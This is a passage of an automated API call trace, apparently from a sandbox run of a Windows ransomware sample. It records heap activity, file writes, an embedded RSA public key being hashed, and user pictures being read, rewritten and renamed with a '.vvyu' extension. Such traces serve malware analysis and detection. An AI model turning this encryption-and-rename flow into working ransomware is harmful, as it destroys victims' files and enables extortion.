(HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39748 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39760 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396d0 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396e8 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396b8 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b50 | out: hHeap=0x6a0000) returned 1 [0187.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.292] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x1513a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x1513a, lpOverlapped=0x0) returned 1 [0187.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.293] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1513f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.293] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.294] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.295] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.295] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.295] CloseHandle (hObject=0x584) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0187.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0187.297] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\8jMjrpIb7p7V7JGa.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\8jmjrpib7p7v7jga.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\8jMjrpIb7p7V7JGa.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\8jmjrpib7p7v7jga.png.vvyu")) returned 1 [0187.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.300] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0187.303] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5563dbf0, ftCreationTime.dwHighDateTime=0x1d8a2f3, ftLastAccessTime.dwLowDateTime=0x333cc4b0, ftLastAccessTime.dwHighDateTime=0x1d8a5af, ftLastWriteTime.dwLowDateTime=0x333cc4b0, ftLastWriteTime.dwHighDateTime=0x1d8a5af, nFileSizeHigh=0x0, nFileSizeLow=0x16b61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9p8OG.bmp", cAlternateFileName="")) returned 1 [0187.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b50 [0187.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fdf8 [0187.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38b50 | out: hHeap=0x6a0000) returned 1 [0187.303] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\9p8OG.bmp") returned=".bmp" [0187.303] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\9p8OG.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\9p8og.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.304] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=93025) returned 1 [0187.304] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.306] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x16b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.307] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.308] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.308] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x16b61, lpOverlapped=0x0) returned 1 [0187.310] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.311] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.312] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.312] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.312] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.312] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.312] GetLastError () returned 0x0 [0187.312] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.312] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.312] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.313] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.313] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16b60) returned 0x2d43778 [0187.313] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b50 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39700 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38b98 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39748 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39730 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.314] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39730 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39748 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39730 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39748 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.316] GetCurrentThreadId () returned 0x264 [0187.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37ac8 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: 